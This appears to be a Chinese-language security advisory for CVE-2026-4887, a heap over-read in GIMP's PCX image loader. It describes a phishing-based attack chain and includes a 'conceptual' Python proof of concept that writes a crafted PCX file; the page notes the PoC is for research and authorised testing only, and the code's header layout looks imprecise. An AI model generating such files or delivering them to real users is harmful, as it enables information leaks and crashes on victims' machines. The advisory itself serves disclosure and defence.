CVE-2026-4887 CVSS 6.1 中危

CVE-2026-4887 GIMP PCX加载器堆缓冲区越界读取漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4887

漏洞类型

堆缓冲区越界读取

CVSS评分

6.1 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GIMP

漏洞概述

GIMP图像处理软件的PCX文件加载器中存在堆缓冲区越界读取漏洞。该漏洞源于代码中的差一错误，未能正确限制内存读取范围。攻击者可诱导用户打开特制的PCX图像文件，成功利用可能导致越界内存信息泄露，严重时引发应用程序崩溃，造成拒绝服务。

技术细节

该漏洞发生在GIMP解析PCX图像文件格式的过程中。根本原因是PCX文件加载器代码存在差一错误，导致在读取图像数据行时，程序访问了已分配堆缓冲区末尾之后的一个字节或多个字节。攻击者可以通过构造特定的PCX文件头部或数据部分来触发此边界检查失败。由于CVSS向量显示需要用户交互（UI:R），攻击通常通过网络钓鱼发送恶意附件进行。触发后，攻击者可读取敏感内存数据（如指针或其他图像数据），或导致Segmentation Fault使GIMP崩溃，从而中断用户工作流。

攻击链分析

STEP 1

构造恶意文件

攻击者利用差一错误构造特制的PCX图像文件，包含触发越界读取的特定数据布局。

STEP 2

投递恶意文件

通过电子邮件或下载链接将恶意PCX文件发送给目标用户。

STEP 3

诱导用户交互

诱导目标用户使用GIMP打开该恶意PCX文件。

STEP 4

触发漏洞

GIMP加载PCX文件时，错误地读取堆缓冲区边界外的内存，导致信息泄露或程序崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct

# Generate a malicious PCX file to trigger the off-by-one heap buffer over-read.
# This is a conceptual PoC based on the vulnerability description.

def create_malicious_pcx(filename):
    # PCX Header (128 bytes)
    # Manufacturer: 10 (ZSoft)
    # Version: 5
    # Encoding: 1 (RLE)
    # Bits per pixel: 8
    header = b'\x0A\x05\x01\x08'
    header += b'\x00\x00' + b'\x00\x00' + b'\x80\x02' + b'\xE0\x01' # Xmin, Ymin, Xmax, Ymax
    header += b'\x80\x02' + b'\xE0\x01' # Hres, Vres
    header += b'\x00' * 48 # Palette
    header += b'\x00' # Reserved
    header += b'\x01' # Bit planes
    # Setting Bytes per line to a value that triggers off-by-one calculation
    header += struct.pack('<H', 641) 
    header += b'\x01\x00' # Palette info
    header += b'\x00' * 58 # Filler

    # Malicious body data
    data = b'\xFF' * 100

    with open(filename, 'wb') as f:
        f.write(header + data)

create_malicious_pcx('exploit.pcx')

影响范围

GIMP (具体受影响版本请参考厂商公告)

防御指南

临时缓解措施

建议用户暂时避免使用GIMP打开未知的PCX文件，并关注GIMP官方发布的安全更新，及时安装补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表